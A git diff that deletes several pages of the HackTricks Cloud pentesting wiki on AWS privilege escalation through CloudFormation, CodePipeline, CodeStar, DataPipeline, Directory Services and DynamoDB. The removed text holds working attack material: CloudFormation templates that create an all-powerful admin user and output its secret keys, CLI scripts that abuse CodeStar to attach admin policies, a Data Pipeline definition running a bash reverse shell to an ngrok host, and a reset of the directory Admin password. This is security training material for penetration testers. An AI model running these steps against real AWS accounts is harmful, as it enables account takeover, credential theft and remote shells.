-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md deleted file mode 100644 index 8147ce381..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md +++ /dev/null @@ -1,109 +0,0 @@ -# iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -An attacker could for example use a **cloudformation template** that generates **keys for an admin** user like: - -```json -{ - "Resources": { - "AdminUser": { - "Type": "AWS::IAM::User" - }, - "AdminPolicy": { - "Type": "AWS::IAM::ManagedPolicy", - "Properties": { - "Description" : "This policy allows all actions on all resources.", - "PolicyDocument": { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": [ - "*" - ], - "Resource": "*" - }] - }, - "Users": [{ - "Ref": "AdminUser" - }] - } - }, - "MyUserKeys": { - "Type": "AWS::IAM::AccessKey", - "Properties": { - "UserName": { - "Ref": "AdminUser" - } - } - } - }, - "Outputs": { - "AccessKey": { - "Value": { - "Ref": "MyUserKeys" - }, - "Description": "Access Key ID of Admin User" - }, - "SecretKey": { - "Value": { - "Fn::GetAtt": [ - "MyUserKeys", - "SecretAccessKey" - ] - }, - "Description": "Secret Key of Admin User" - } - } -} -``` - -Then **generate the cloudformation stack**: - -```bash -aws cloudformation create-stack --stack-name privesc \ - --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ - --role arn:aws:iam::[REDACTED]:role/adminaccess \ - --capabilities CAPABILITY_IAM --region us-west-2 -``` - -**Wait for a couple of minutes** for the stack to be generated and then **get the output** of the stack where the **credentials are stored**: - -```bash -aws cloudformation describe-stacks \ - --stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \ - --region uswest-2 -``` - -### References - -* [https://bishopfox.com/blog/privilege-escalation-in-aws](https://bishopfox.com/blog/privilege-escalation-in-aws) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md deleted file mode 100644 index d9fdae9de..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md +++ /dev/null @@ -1,63 +0,0 @@ -# AWS - Codepipeline Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## codepipeline - -For more info about codepipeline check: - -{% content-ref url="../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md" %} -[aws-datapipeline-codepipeline-codebuild-and-codecommit.md](../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md) -{% endcontent-ref %} - -### `iam:PassRole`, `codepipeline:CreatePipeline`, `codebuild:CreateProject, codepipeline:StartPipelineExecution` - -When creating a code pipeline you can indicate a **codepipeline IAM Role to run**, therefore you could compromise them. - -Apart from the previous permissions you would need **access to the place where the code is stored** (S3, ECR, github, bitbucket...) - -I tested this doing the process in the web page, the permissions indicated previously are the not List/Get ones needed to create a codepipeline, but for creating it in the web you will also need: `codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:` - -During the **creation of the build project** you can indicate a **command to run** (rev shell?) and to run the build phase as **privileged user**, that's the configuration the attacker needs to compromise: - -![](<../../../.gitbook/assets/image (276).png>) - -![](<../../../.gitbook/assets/image (181).png>) - -### ?`codebuild:UpdateProject, codepipeline:UpdatePipeline, codepipeline:StartPipelineExecution` - -It might be possible to modify the role used and the command executed on a codepipeline with the previous permissions. - -### `codepipeline:pollforjobs` - -[AWS mentions](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html): - -> When this API is called, CodePipeline **returns temporary credentials for the S3 bucket** used to store artifacts for the pipeline, if the action requires access to that S3 bucket for input or output artifacts. This API also **returns any secret values defined for the action**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md deleted file mode 100644 index 106d50e48..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md +++ /dev/null @@ -1,99 +0,0 @@ -# AWS - Codestar Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Codestar - -You can find more information about codestar in: - -{% content-ref url="codestar-createproject-codestar-associateteammember.md" %} -[codestar-createproject-codestar-associateteammember.md](codestar-createproject-codestar-associateteammember.md) -{% endcontent-ref %} - -### `iam:PassRole`, `codestar:CreateProject` - -With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. Check the following page: - -{% content-ref url="iam-passrole-codestar-createproject.md" %} -[iam-passrole-codestar-createproject.md](iam-passrole-codestar-createproject.md) -{% endcontent-ref %} - -### `codestar:CreateProject`, `codestar:AssociateTeamMember` - -This technique uses `codestar:CreateProject` to create a codestar project, and `codestar:AssociateTeamMember` to make an IAM user the **owner** of a new CodeStar **project**, which will grant them a **new policy with a few extra permissions**. - -```bash -PROJECT_NAME="supercodestar" - -aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \ - --name $PROJECT_NAME \ - --id $PROJECT_NAME - -echo "Waiting 1min to start the project" -sleep 60 - -USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"') - -aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \ - --project-id $PROJECT_NAME \ - --user-arn "$USER_ARN" \ - --project-role "Owner" \ - --remote-access-allowed -``` - -If you are already a **member of the project** you can use the permission **`codestar:UpdateTeamMember`** to **update your role** to owner instead of `codestar:AssociateTeamMember` - -**Potential Impact:** Privesc to the codestar policy generated. You can find an example of that policy in: - -{% content-ref url="codestar-createproject-codestar-associateteammember.md" %} -[codestar-createproject-codestar-associateteammember.md](codestar-createproject-codestar-associateteammember.md) -{% endcontent-ref %} - -### `codestar:CreateProjectFromTemplate` - -1. **Create a New Project:** - * Utilize the **`codestar:CreateProjectFromTemplate`** action to initiate the creation of a new project. - * Upon successful creation, access is automatically granted for **`cloudformation:UpdateStack`**. - * This access specifically targets a stack associated with the `CodeStarWorker--CloudFormation` IAM role. -2. **Update the Target Stack:** - * With the granted CloudFormation permissions, proceed to update the specified stack. - * The stack's name will typically conform to one of two patterns: - * `awscodestar--infrastructure` - * `awscodestar--lambda` - * The exact name depends on the chosen template (referencing the example exploit script). -3. **Access and Permissions:** - * Post-update, you obtain the capabilities assigned to the **CloudFormation IAM role** linked with the stack. - * Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further. - -For more information check the original research: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).\ -You can find the exploit in [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar\_createprojectfromtemplate\_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py) - -**Potential Impact:** Privesc to cloudformation IAM role. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md deleted file mode 100644 index 883d19f18..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md +++ /dev/null @@ -1,115 +0,0 @@ -# codestar:CreateProject, codestar:AssociateTeamMember - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -This is the created policy the user can privesc to (the project name was `supercodestar`): - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "1", - "Effect": "Allow", - "Action": [ - "codestar:*", - "iam:GetPolicy*", - "iam:ListPolicyVersions" - ], - "Resource": [ - "arn:aws:codestar:eu-west-1:947247140022:project/supercodestar", - "arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent", - "arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner" - ] - }, - { - "Sid": "2", - "Effect": "Allow", - "Action": [ - "codestar:DescribeUserProfile", - "codestar:ListProjects", - "codestar:ListUserProfiles", - "codestar:VerifyServiceRole", - "cloud9:DescribeEnvironment*", - "cloud9:ValidateEnvironmentName", - "cloudwatch:DescribeAlarms", - "cloudwatch:GetMetricStatistics", - "cloudwatch:ListMetrics", - "codedeploy:BatchGet*", - "codedeploy:List*", - "codestar-connections:UseConnection", - "ec2:DescribeInstanceTypeOfferings", - "ec2:DescribeInternetGateways", - "ec2:DescribeNatGateways", - "ec2:DescribeRouteTables", - "ec2:DescribeSecurityGroups", - "ec2:DescribeSubnets", - "ec2:DescribeVpcs", - "events:ListRuleNamesByTarget", - "iam:GetAccountSummary", - "iam:GetUser", - "iam:ListAccountAliases", - "iam:ListRoles", - "iam:ListUsers", - "lambda:List*", - "sns:List*" - ], - "Resource": [ - "*" - ] - }, - { - "Sid": "3", - "Effect": "Allow", - "Action": [ - "codestar:*UserProfile", - "iam:GenerateCredentialReport", - "iam:GenerateServiceLastAccessedDetails", - "iam:CreateAccessKey", - "iam:UpdateAccessKey", - "iam:DeleteAccessKey", - "iam:UpdateSSHPublicKey", - "iam:UploadSSHPublicKey", - "iam:DeleteSSHPublicKey", - "iam:CreateServiceSpecificCredential", - "iam:UpdateServiceSpecificCredential", - "iam:DeleteServiceSpecificCredential", - "iam:ResetServiceSpecificCredential", - "iam:Get*", - "iam:List*" - ], - "Resource": [ - "arn:aws:iam::947247140022:user/${aws:username}" - ] - } - ] -} -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md deleted file mode 100644 index 60d1b28c4..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md +++ /dev/null @@ -1,118 +0,0 @@ -# iam:PassRole, codestar:CreateProject - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. - -To exploit this you need to create a **S3 bucket that is accessible** from the attacked account. Upload a file called `toolchain.json` . This file should contain the **cloudformation template exploit**. The following one can be used to set a managed policy to a user under your control and **give it admin permissions**: - -{% code title="toolchain.json" %} -```json -{ - "Resources": { - "supercodestar": { - "Type": "AWS::IAM::ManagedPolicy", - "Properties": { - "ManagedPolicyName": "CodeStar_supercodestar", - "PolicyDocument": { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": "*", - "Resource": "*" - } - ] - }, - "Users": [ - "" - ] - } - } - } -} -``` -{% endcode %} - -Also **upload** this `empty zip` file to the **bucket**: - -{% file src="../../../../.gitbook/assets/empty.zip" %} - -Remember that the **bucket with both files must be accessible by the victim account**. - -With both things uploaded you can now proceed to the **exploitation** creating a **codestar** project: - -```bash -PROJECT_NAME="supercodestar" - -# Crecte the source JSON -## In this JSON the bucket and key (path) to the empry.zip file is used -SOURCE_CODE_PATH="/tmp/surce_code.json" -SOURCE_CODE="[ - { - \"source\": { - \"s3\": { - \"bucketName\": \"privesc\", - \"bucketKey\": \"empty.zip\" - } - }, - \"destination\": { - \"codeCommit\": { - \"name\": \"$PROJECT_NAME\" - } - } - } -]" -printf "$SOURCE_CODE" > $SOURCE_CODE_PATH - -# Create the toolchain JSON -## In this JSON the bucket and key (path) to the toolchain.json file is used -TOOLCHAIN_PATH="/tmp/tool_chain.json" -TOOLCHAIN="{ - \"source\": { - \"s3\": { - \"bucketName\": \"privesc\", - \"bucketKey\": \"toolchain.json\" - } - }, - \"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\" -}" -printf "$TOOLCHAIN" > $TOOLCHAIN_PATH - -# Create the codestar project that will use the cloudformation epxloit to privesc -aws codestar create-project \ - --name $PROJECT_NAME \ - --id $PROJECT_NAME \ - --source-code file://$SOURCE_CODE_PATH \ - --toolchain file://$TOOLCHAIN_PATH -``` - -This exploit is based on the **Pacu exploit of these privileges**: [https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc\_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) On it you can find a variation to create an admin managed policy for a role instead of to a user. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md deleted file mode 100644 index 4e5b80724..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md +++ /dev/null @@ -1,100 +0,0 @@ -# AWS - Datapipeline Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## datapipeline - -For more info about datapipeline check: - -{% content-ref url="../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md" %} -[aws-datapipeline-codepipeline-codebuild-and-codecommit.md](../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md) -{% endcontent-ref %} - -### `iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline` - -Users with these **permissions can escalate privileges by creating a Data Pipeline** to execute arbitrary commands using the **permissions of the assigned role:** - -```bash -aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string -``` - -After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations: - -```json -{ - "objects": [ - { - "id" : "CreateDirectory", - "type" : "ShellCommandActivity", - "command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'", - "runsOn" : {"ref": "instance"} - }, - { - "id": "Default", - "scheduleType": "ondemand", - "failureAndRerunMode": "CASCADE", - "name": "Default", - "role": "assumable_datapipeline", - "resourceRole": "assumable_datapipeline" - }, - { - "id" : "instance", - "name" : "instance", - "type" : "Ec2Resource", - "actionOnTaskFailure" : "terminate", - "actionOnResourceFailure" : "retryAll", - "maximumRetries" : "1", - "instanceType" : "t2.micro", - "securityGroups" : ["default"], - "role" : "assumable_datapipeline", - "resourceRole" : "assumable_ec2_profile_instance" - }] -} -``` - -{% hint style="info" %} -Note that the **role** in **line 14, 15 and 27** needs to be a role **assumable by datapipeline.amazonaws.com** and the role in **line 28** needs to be a **role assumable by ec2.amazonaws.com with a EC2 profile instance**. - -Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one). -{% endhint %} - -```bash -aws datapipeline put-pipeline-definition --pipeline-id \ - --pipeline-definition file:///pipeline/definition.json -``` - -The **pipeline definition file, crafted by the attacker, includes directives to execute commands** or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges. - -**Potential Impact:** Direct privesc to the ec2 service role specified. - -## References - -* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md deleted file mode 100644 index 33898f048..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md +++ /dev/null @@ -1,60 +0,0 @@ -# AWS - Directory Services Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Directory Services - -For more info about directory services check: - -{% content-ref url="../aws-services/aws-directory-services-workdocs-enum.md" %} -[aws-directory-services-workdocs-enum.md](../aws-services/aws-directory-services-workdocs-enum.md) -{% endcontent-ref %} - -### `ds:ResetUserPassword` - -This permission allows to **change** the **password** of any **existent** user in the Active Directory.\ -By default, the only existent user is **Admin**. - -``` -aws ds reset-user-password --directory-id --user-name Admin --new-password Newpassword123. -``` - -### AWS Management Console - -It's possible to enable an **application access URL** that users from AD can access to login: - -
- -And then **grant them an AWS IAM role** for when they login, this way an AD user/group will have access over AWS management console: - -
- -There isn't apparently any way to enable the application access URL, the AWS Management Console and grant permission - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md deleted file mode 100644 index 3fedf519a..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md +++ /dev/null @@ -1,49 +0,0 @@ -# AWS - DynamoDB Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## dynamodb - -For more info about dynamodb check: - -{% content-ref url="../aws-services/aws-dynamodb-enum.md" %} -[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md) -{% endcontent-ref %} - -### Post Exploitation - -As far as I know there is **no direct way to escalate privileges in AWS just by having some AWS `dynamodb` permissions**. You can **read sensitive** information from the tables (which could contain AWS credentials) and **write information on the tables** (which could trigger other vulnerabilities, like lambda code injections...) but all these options are already considered in the **DynamoDB Post Exploitation page**: - -{% content-ref url="../aws-post-exploitation/aws-dynamodb-post-exploitation.md" %} -[aws-dynamodb-post-exploitation.md](../aws-post-exploitation/aws-dynamodb-post-exploitation.md) -{% endcontent-ref %} - -### TODO: Read data abusing data Streams - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
